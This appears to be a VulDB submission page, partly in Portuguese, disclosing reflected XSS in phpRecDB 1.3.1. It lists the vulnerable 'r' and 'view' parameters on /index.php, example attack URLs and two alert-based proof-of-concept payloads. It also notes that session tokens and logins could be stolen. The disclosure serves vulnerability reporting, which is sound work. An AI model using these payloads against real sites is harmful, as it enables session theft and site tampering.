| Título | phpRecDB 1.3.1 - Reflected XSS |
|---|
| Descrição | # Exploit Title: phpRecDB 1.3.1 - Reflected XSS
# Exploit Author: skalvin aka (CraCkEr)
# Date: 30/07/2023
# Vendor: phprecdb.com
# Vendor Homepage: http://www.phprecdb.com/
# Software Link: http://www.phprecdb.com/demo/
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /index.php
GET parameter 'r' is vulnerable to XSS
http://website/index.php?ajax=yw0&r=site%2fpage[XSS]&sort=Artist&view=news
XSS Payload: ov8mn<img src=a onerror=alert(1)>expro
Path: /index.php
GET parameter 'view' is vulnerable to XSS
http://www.website/index.php?ajax=yw0&r=site%2Fpage&sort=Artist&view=news[XSS]
XSS Payload: p96xr<script>alert(1)</script>axjwn
[-] Done |
|---|
| Utilizador | skalvin (UID 49463) |
|---|
| Submissão | 30/07/2023 00h38 (há 3 anos) |
|---|
| Moderação | 15/08/2023 12h09 (16 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 237194 [phpRecDB 1.3.1 /index.php r/view Script de Site Cruzado] |
|---|
| Pontos | 17 |
|---|